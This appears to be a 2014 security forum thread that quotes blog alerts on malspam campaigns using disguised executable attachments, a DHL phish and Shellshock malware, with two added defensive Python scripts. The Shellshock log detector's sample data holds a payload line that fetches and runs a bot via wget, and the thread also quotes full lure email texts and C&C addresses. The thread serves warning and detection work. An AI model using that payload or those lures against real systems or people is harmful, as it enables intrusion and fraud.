- http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer

The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/41cf7ad7f6090e20412f05ef92b7b6a91499190a4ef4bc01fc52aac6cc7ed036/analysis/1412241170/
___

Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-94864-pm-shipping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...

The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...

2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f512adf0abfa86ce39d355b5c5f44be91d88012e9c3d6c2541d22c902eab4576/analysis/1412253608/

- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___

Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-photos-insurance-company-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names and email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santander-new-edocument-arrived-fake-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/santander_statement.png

... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
[Still more XP users than Vista, Win8, and Win8.1 combined]
___

Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake-email-regarding-outstanding-amount-contains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice

This email is sent from a spoofed address and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...

The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e09375d8ce97b76df1d2037a7f9511d5035a1bc35e87568995721349513386c7/analysis/1412243475/

The 2nd campaign has the following details: This email is sent from spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD

The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/31ff7ccaae4f3fe15df8d52fe18e9017888ae13877eefbf9314e6d76cb32cefa/analysis/

:mad: :fear:
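Nearly every entry in this post comes back to the same mechanism: the ZIP contains an .exe or .scr whose icon resource claims it is a PDF or spreadsheet, and with "Hide extensions for known file types" on, Explorer shows "Invoice_815992488951.xls" rather than "Invoice_815992488951.xls.scr". The following is an added example (not code from myonlinesecurity, MX Lab or Dynamoo) of how a mail gateway or triage script can make that judgement without relying on the icon: classify by the real last extension, reconstruct what the user would see, and sniff ZIP members for the "MZ" header an executable must carry. The extension sets are my own heuristic and the sample names are constructed from the lure styles quoted above.

```python
"""Flag e-mail attachments that disguise an executable as a document.

Added example for this thread, not code from any of the quoted blogs.
The extension lists are a heuristic (an assumption, not a vendor list)
and the sample names are constructed from the lure styles above.
"""
import io
import re
import zipfile
from typing import Dict, List

# What Windows runs on double-click. With "show known file extensions"
# off, Explorer hides the *last* extension, so "Invoice.xls.scr" is shown
# as "Invoice.xls" next to whatever icon the file's resource claims.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js",
                   "jse", "wsf", "hta", "lnk", "cpl"}
# Document/media types that lures impersonate (the thread's PDF/XLS/WAV).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
                 "wav", "txt", "htm", "html"}
# Office formats that can carry VBA macros (the "Reply02.doc" lure above).
MACRO_EXTS = {"doc", "xls", "ppt", "docm", "xlsm", "pptm"}
ARCHIVE_EXTS = {"zip", "rar", "7z", "cab"}


def assess_attachment(name: str) -> Dict[str, object]:
    """Classify one filename by its real (last) extension and what Explorer would display."""
    lowered = name.strip().lower()
    parts = lowered.split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    # The name as shown with extensions hidden: everything before the last dot.
    displayed = lowered[: -(len(real_ext) + 1)] if real_ext else lowered
    # Inner "extensions": the first token of each middle component, so that
    # "PAYMENT DETAILS.PDF .scr_56453.exe" yields {"pdf", "scr"}.
    inner = {m.group(0) for p in parts[1:-1]
             for m in [re.match(r"[a-z0-9]+", p.strip())] if m}
    if real_ext in EXECUTABLE_EXTS:
        verdict = ("executable-disguised-as-document"
                   if inner & DOCUMENT_EXTS else "executable")
    elif real_ext in MACRO_EXTS:
        verdict = "macro-capable-document"
    elif real_ext in ARCHIVE_EXTS:
        verdict = "archive-inspect-contents"
    elif real_ext in DOCUMENT_EXTS:
        verdict = "document"
    else:
        verdict = "unknown"
    return {"name": name, "real_ext": real_ext, "displayed_as": displayed,
            "verdict": verdict}


def inspect_zip(data: bytes) -> List[Dict[str, object]]:
    """Assess every member of an in-memory ZIP and sniff for a PE ("MZ") header."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            verdict = assess_attachment(info.filename)
            # A genuine PDF/XLS never starts with the DOS "MZ" stub; a Windows .exe/.scr does.
            verdict["pe_header"] = zf.read(info).startswith(b"MZ")
            results.append(verdict)
    return results


def build_sample_zip() -> bytes:
    """Constructed stand-in for the thread's 'Copy4167506/9332.zip' style lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Not a real program: just the MZ magic followed by filler bytes.
        zf.writestr("Invoice_815992488951.xls.scr", b"MZ" + b"\x00" * 64)
    return buf.getvalue()


def flag_attachments(names: List[str]) -> List[str]:
    """Return the names a mail gateway should quarantine or at least warn about."""
    risky = {"executable", "executable-disguised-as-document",
             "macro-capable-document"}
    return [n for n in names if assess_attachment(n)["verdict"] in risky]


if __name__ == "__main__":
    # Sample names constructed from the lures quoted in this thread.
    samples = ["facsimile_page2_10.02.2014.exe", "mydocs.scr",
               "Invoice_815992488951.xls.scr", "Reply02.doc",
               "PAYMENT DETAILS.PDF .scr_56453.exe", "quarterly-report.pdf"]
    for n in samples:
        print(assess_attachment(n))
    print(inspect_zip(build_sample_zip()))
```

The point of `displayed_as` is to show the analyst exactly the string the victim saw; the point of `pe_header` is that the classification does not depend on the name at all, which matters for the .pif and .scr cases where users have no intuition about the extension. On the endpoint side the setting the quoted posts keep referring to is the Explorer "Hide extensions for known file types" option (registry value `HideFileExt` under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced`); setting it to 0 makes the trailing .exe visible.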

AplusWebMaster
2014-10-03, 14:54
FYI...

Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-transactions-report-users-2014-09-28-2014-09-28-fake-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:

Your requested report is attached here...

3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e836820d947de6da456a61b37f9c9cdf749a61211b52a51a2aef0aab5786239f/analysis/1412331282/
___

Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/thanks-for-shopping-with-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...

In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/file/7b255b6d648f670bd7ecbae80983230fedbce13cfcf2e93a0887fba53b5c42ad/analysis/1412334793/
___

Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-personal-reply-id-509359-word-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Office_macro.png

3 October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/75fda9cc7d62d11e88ddfae10b094af5a46b87a838bbe45954cdb3c27d098b73/analysis/1412314059/
___

Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/malicious-adobe-invoice-doc-attached-to-fake-emails-adobe-creative-cloud-service-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is sent from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif

The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
___

Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/securitylabs/archive/2014/10/01/malware-in-the-wild-abusing-shellshock-vulnerability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-address/208.118.61.44/information/
27.19.159.224: https://www.virustotal.com/en/ip-address/27.19.159.224/information/
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
212.227.251.139: https://www.virustotal.com/en/ip-address/212.227.251.139/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."

- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014

:fear::fear: :mad:
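The Websense write-up above describes the in-the-wild pattern: the Shellshock bug is triggered through an attacker-controlled HTTP header, and the injected command fetches a payload with curl or wget before executing it. Since the CGI request is logged whether or not the exploit succeeded, the access log is the cheapest place to find these probes after the fact. The following is an added example (not from Websense or Arbor) of that detection logic run over constructed Apache combined-format log lines; the addresses are documentation-range IPs, not the C&C indicators listed above, and the parsing regex assumes the stock combined format.

```python
"""Spot Shellshock-style probes in web-server access logs.

Added example for this thread; it is not from the Websense or Arbor posts
quoted above. The log lines are constructed in Apache combined format and
use documentation-range addresses, not the C&C indicators listed above.
"""
import re
from typing import Dict, List, Optional

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The bash function-import prefix that CVE-2014-6271 style payloads carry.
# Whitespace between "()" and "{" is optional, which covers the common spellings.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# The stage-two behaviour described above: fetching a payload with curl or wget.
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")

# Constructed sample log. Line 1 carries a probe in the User-Agent, line 3 in
# the Referer; lines 2 and 4 are benign (line 4 is a plain curl client, which
# must NOT alert on its own).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Oct/2014:10:14:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.5/bot -O /tmp/bot; sh /tmp/bot'"
192.0.2.44 - - [01/Oct/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/32.0"
198.51.100.7 - - [01/Oct/2014:10:14:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "() { :;}; echo probe" "curl/7.30.0"
203.0.113.9 - - [01/Oct/2014:10:15:00 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "curl/7.30.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_entry(entry: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert if any attacker-controlled field carries the function prefix."""
    for field in ("req", "ref", "ua"):
        value = entry[field]
        if SHELLSHOCK_RE.search(value):
            return {"ip": entry["ip"], "ts": entry["ts"], "field": field,
                    # Only the field holding the prefix is checked for a downloader,
                    # so a benign "curl/7.30.0" User-Agent elsewhere does not taint it.
                    "downloader": bool(DOWNLOADER_RE.search(value)),
                    "payload": value}
    return None


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run check_entry over every parseable line and collect the alerts."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: count these separately in production
        alert = check_entry(entry)
        if alert:
            alerts.append(alert)
    return alerts


def attackers(alerts: List[Dict[str, object]]) -> Dict[str, int]:
    """Source IPs by number of probes, ready for a blocklist or firewall rule."""
    counts: Dict[str, int] = {}
    for a in alerts:
        ip = str(a["ip"])
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for a in found:
        print(f"{a['ts']} {a['ip']} field={a['field']} downloader={a['downloader']}")
    print(attackers(found))
```

Two design notes. The detector keys on the function-definition prefix rather than on "curl" or "wget", because plenty of legitimate monitoring traffic identifies itself as curl (line 4) and would drown the signal. And it checks the request line and Referer as well as the User-Agent, since any header a CGI server copies into an environment variable is a viable carrier; the Yahoo statement later in this thread is a reminder that what looks like a Shellshock hit in the logs may be triggering a different bug in a script that parses those very logs, so alerts should lead to a trace of the actual execution path, not just a patch check.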

AplusWebMaster
2014-10-06, 15:15
FYI...

Fake Western Union invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/western-union-invoice-5751107-october-fake-pdf-malware/
6 Oct 2014 - "'invoice 5751107 October' pretending to come from Western Union Inc and quite a few others coming from a random single name like Amelia, Fred, John etc at random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8017730 Account No 5608017730.
Thanks very much
Western Union Inc. 2014 @ All rights reserved.

The earlier email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 5751107 Account No 5605751107.
Thanks very much
Amelia ...

6 October 2014: invoice_5751107.zip: Extracts to: invoice.0914.1602783433405300232.exe
Current Virus total detections: 9/55* . This invoice 5751107 October pretending to come from Western Union is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ce97ddc450b4aefc33e279992c2a201297d74eb56ff98f8ed188fa2c0990485b/analysis/1412589518/
___

Fake Bank confirmation SPAM - PDF malware
- http://myonlinesecurity.co.uk/chen-young-bank-swift-fake-pdf-malware/
6 Oct 2014 - "'CHEN YOUNG BANK SWIFT' pretending to come from CHEN YOUNG is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
My bank have made the payment and the funds will arrive your bank in 3 days time. Attached is the bank confirmation Swift, let me know if your bank details are ok in the SWIFT
Thank you!
Chen Young
Branch Manager
YangZhou Wells Imp&Exp Co., Ltd
9-525 Modern Square,
Wenhui West Road
Yangzhou, Jiangsu. CHINA
Fax: 0086 514 8795 1721 / 0086 514 8795 1752

6 October 2014: SWIFT_0000019989399188321110000011.zip:
Extracts to: SWIFT_000001998939918835961163324799.exe
Current Virus total detections: 9/55* . This 'CHEN YOUNG BANK SWIFT' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ff424a01fd1a1f3fd0bb50704d16cd8fe63f7d4136b2df4bf6b8924bace8c979/analysis/1412582411/
___

Fake Tiffany invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tiffany-invoice-copy-waiting-confirmation-fake-pdf-malware/
6 Oct 2014 - "'invoice copy (waiting for your confirmation)' pretending to come from Tiffany & Co. <j.parker@ tiffany .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.
Thanks J.parker
Tiffany & Co.

6 October 2014: Tiffany order details 06-10-2014.zip:
Extracts to: Tiffany order details 06-10-2014.exe
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f1b13062f764e0e5643da3e74753d912d596cc362def9142263cea0e686bba80/analysis/1412597423/

:fear: :mad:

AplusWebMaster
2014-10-07, 15:35
FYI...

DHL phish ...
- http://blog.dynamoo.com/2014/10/dhl-themed-phish-goes-to-lot-of-effort.html
7 Oct 2014 - "This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Screenshot: https://3.bp.blogspot.com/-J8JkllU3g1M/VDOdr9sAc5I/AAAAAAAAFyQ/VE4P9MxOkGY/s1600/dhl.png

Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
Screenshot2: https://2.bp.blogspot.com/-smrDiPpKzJY/VDOeWRTX8uI/AAAAAAAAFyY/oucaylYyHdQ/s1600/dhl2.png

... a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199 /~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index .htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
Screenshot3: https://4.bp.blogspot.com/-BDpUiMlKaEk/VDOfv4G-CmI/AAAAAAAAFyk/sS4m_BsPR1I/s1600/dhl3.png

With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile."

37.61.235.199: https://www.virustotal.com/en/ip-address/37.61.235.199/information/
___

Fake Outlook voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/microsoft-outlook-received-voice-mail-fake-wav-malware/
7 Oct 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook <no-reply@ random domain address > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE0003589463733.wav
Caller-Id: 3589463733
Message-Id: ZU1I9W
Email-Id: montag @ myonlinesecurity .co .uk
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

7 October 2014: VOICE3589463733.wav.zip: Extracts to: VOICE000358276655116307.exe
Current Virus total detections: 10/55* . This You have received a voice mail is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound ) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fb286c8c0c1bbf7c89be27016a7fce614515fa47e1e5219618b15ead6d0cf544/analysis/1412673429/
___

Vishing ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/here-vishy-vishy/
Oct 7, 2014 - "Voice phishing – Vishing, for short – has been around for a long time and is all about using the phone and social engineering to grab the information required...
Ref: http://www.edinburghnews.scotsman.com/news/crime/vishing-scammers-con-woman-out-of-80-000-1-3540027
...
- http://www.telegraph.co.uk/finance/personalfinance/bank-accounts/10882193/I-lost-17500-in-vishing-scam-because-I-didnt-watch-The-One-Show.html
Vishing can start with an email or a text but the ultimate goal is to get you on the other end of a telephone line. From there, the -scammers- will go about harvesting your data by pretending to be your bank and asking for card... It’s important to remember there are many more ways to fall foul of a telephone scam than “just” Vishing, and you can take a look at some more examples in a roundup by the FTC*..."
* http://www.consumer.ftc.gov/articles/0076-phone-scams
___

419 SCAM - Breast Cancer Awareness Donation
- http://myonlinesecurity.co.uk/ongoing-breast-cancer-awareness-donation-program-419-scam/
7 Oct 2014 - "This rather evil and nasty 419 scam saying Ongoing Breast Cancer Awareness Donation Program pretends to come from Neil trotter Cancer Foundation <neil–trotter@ [redacted] .com>... The email looks like this with pictures:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Ongoing-Breast-Cancer-Awareness-Donation-Program.png

Obviously it is a total -scam- and you should -not- reply to any email received that is like this."
___

Fake inTuit/Apple malicious SPAM
- https://security.intuit.com/alert.php?a=111
Oct 7, 2014 - "People are receiving fake emails with the title 'Your receipt No.557911643385'. These mails are coming from applecenter@ security .intuit .com, which is -not- a legitimate email address (spoofed). Below is a copy of the email people are receiving:

Apple iTunes
October 07, 2014
Billed To:
Order ID: KT85GMQ55L
Receipt Date: 10/07/2014
Order Total: $161.98
Billed To: Store Credit
Item Artist
August: Osage County John Wells
My Man Is a Loser Mike Young
Type Unit Price
Film Rental(HD) $67.99
Film Rental(HD) $93.99
Order Total
$161.98
Issues with this transaction?
If you haven't authorized this transaction, click the link below to get full refund...
2014 Apple Online Support

This is the end of the -fake- email.
Steps to Take Now:
- Do not open the attachment in the email.
- Do not -click- on any -links- in the email.
- Delete the email."
___

Yahoo Sports servers - malicious code
- http://www.theinquirer.net/inquirer/news/2374191/yahoo-shellshock-not-to-blame-for-server-security-flaw
Oct 7 2014 - "... there was some kind of security breach on its servers, but took pains to clear up reports which suggested that Shellshock was the reason. Yahoo's chief information security officer, Alex Stamos, took to the net to counter comments that began at Yahoo*..."
* https://news.ycombinator.com/item?id=8418809
Oct 6 2014 - "... I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact -not- affected by Shellshock. Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs. Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found -no- evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been -fixed- and we have added this pattern to our CI/CD code scanners to catch future issues... the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: -not- Shellshock... just because exploit code works doesn’t mean it triggered the bug you expected!... Yahoo takes external security reports seriously and we strive to respond immediately to credible tips... our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation..."
___

Adobe - spying on e-book readers
